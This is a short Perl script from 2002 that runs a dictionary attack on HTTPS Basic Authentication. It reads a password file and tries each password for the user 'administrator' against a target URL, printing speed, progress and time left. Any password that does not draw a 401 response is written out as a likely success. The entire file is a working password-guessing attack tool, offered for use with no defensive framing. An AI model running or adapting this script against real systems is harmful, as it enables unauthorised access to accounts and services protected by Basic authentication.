#!/usr/bin/perl
# HTTPS (SSL) Basic Authentication dictionary attack 
# Requires Crypto::SSLeay from CPAN
# Copyright (C) 2002 by Eugene Taylashev
# Version 1.01 Modified: 2002-12-17

# Outputs success to STDERR 
# Progress to STDOUT


use Time::HiRes qw ( time );
use LWP::UserAgent;

#---- Session specific settings -----
my $urlTarget= 'https://your_target.com';
my $file_passwd = 'passwd1.dic';
my $user_name = 'administrator';


print "Target: $urlTarget\nDictionary file: $file_passwd\n";

open FPWD, "$file_passwd" or die "Could't open file $file_passwd:$!\n";
my $flines = 0;
while(<FPWD>){
  ++$flines;
  }
print "Number of lines in the dic file: $flines\n";
close FPWD;
open FPWD, "$file_passwd" or die "Could't open file $file_passwd:$!\n";


my $ua = new LWP::UserAgent;
$ua->timeout(30);

my $res;
my $req = HTTP::Request->new ('GET', $urlTarget);
$req->headers->authorization;

my $curr_line=0;
my $cur_pwd, $tstart, $tend, $tdelta, $tleft;
my $per, $speed;
while(<FPWD>){
    chomp;
    $cur_pwd = $_;
    $tstart = time();
    $req->headers->authorization_basic($user_name, $cur_pwd );

    #-- send the request
    $res = $ua->request($req);
    $tend = time();
    
    #-- show progress
    ++$curr_line;
    $per = int( $curr_line/$flines*100);
    $tdelta = ($tend-$tstart>0)?($tend-$tstart):1;
    $speed = int(60/$tdelta);  #-- speed in attempts per minute (apm)
    $tleft = int(($flines-$curr_line)/$speed) if( $speed);  #-- minutes left
    
    #-- convert into humar format
    my $hform = ''; 
    if( ($tleft/1440) > 1){
	$hform .= int($tleft/1440) . ' days; '; 
    }
    elsif( ($tleft/60) > 1){
	$hform .= int($tleft/60) . ' hours; '; 
    }
    else {
	$hform .= $tleft . ' min; ';
    }
    print STDOUT "$speed apm, Done $per%, left $hform" . $res->code."=>".$cur_pwd ."\n";

    #-- report success
    if( $res->code != 401 ) {
	print STDERR $res->code."=>".$cur_pwd ."\n";
    }
}

close( FPWD );